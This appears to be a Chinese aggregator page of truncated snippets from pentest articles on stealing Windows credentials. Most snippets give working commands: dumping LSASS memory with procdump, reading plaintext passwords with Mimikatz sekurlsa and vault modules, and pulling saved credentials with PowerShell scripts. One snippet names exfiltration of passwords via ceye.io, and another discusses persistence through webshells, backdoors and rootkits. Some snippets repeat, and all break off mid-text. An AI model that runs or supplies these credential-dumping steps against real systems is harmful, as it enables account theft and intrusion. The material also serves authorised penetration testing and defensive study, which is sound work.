Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行! 那么如何dump LSASS进程内存呢.可以通过以下方式: 1.对于NT6可以使用windows自带的功能进行dump: 任务管理器—进程—显示所有用户进程—找到lsas…
思路: 就是通过系统自带的procdump去下载存储用户名密码的文件(应该不能那么说这个文件,但是这样理解没问题),然后用猕猴桃读取. procdump.exe Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中. procdump下载地址:https://docs.microsoft.co…
当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获.用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马…
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码. 0x01 操作 Windows10/2012 以下的版本:1.上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.拿到 mimikatz 文件夹执行命令读明文: sekurlsa::minidump lsass.dmp sekurlsa::logon…
官网 http://blog.gentilkiwi.com/mimikatz 下载地点 https://github.com/gentilkiwi/mimikatz/releases/latest 使用的命令 运行 mimikatz 输入命令 privilege::debug 然后输入 sekurlsa:: logonpasswords 就能够获取密码..…
利用Powershell和ceye.io实现Windows账户密码回传 转自:http://www.freebuf.com/articles/system/129068.html 最近在研究Powershell的使用,之前我一直不习惯Windows的主要原因是他那孱弱的命令行工具,稍微了解了Powershell之后差点跪下了,真的是一款非常了不起的工具.powershell的定义是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能.简单的理解就…
1.前言 mimikatz框架是非常精妙的,粗浅讲一下修改的思路. 它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块 mimikatz.c 部分代码: NTSTATUS mimikatz_doLocal(wchar_t * input) { NTSTATUS status = STATUS_SUCCESS; // 参数个数定义 int argc; // 获取输入的值,参数个数赋值 // wchar_t ** argv = CommandLineToArgvW(input,…
1.运行cmdkey /list查看windows保存凭证 方法1.mimikaz mimikatz vault::cred 2.利用powershell尝试获取 windows 普通凭据类型中的明文密码 powershell-import F:\tools\powershell脚本\Invoke-WCMDump.ps1 powershell Invoke-WCMDdump 3.powershell试获取 web 凭据中的各类明文密码 powershell-import F:\tools\pow…
1.运行cmdkey /list查看windows保存凭证 方法1.mimikaz mimikatz vault::cred 2.利用powershell尝试获取 windows 普通凭据类型中的明文密码 powershell-import F:\tools\powershell脚本\Invoke-WCMDump.ps1 powershell Invoke-WCMDdump 3.powershell试获取 web 凭据中的各类明文密码 powershell-import F:\tools\pow…
使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样 1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp (注:必须使用管理员权限) ProcDump v8.0 - Wr…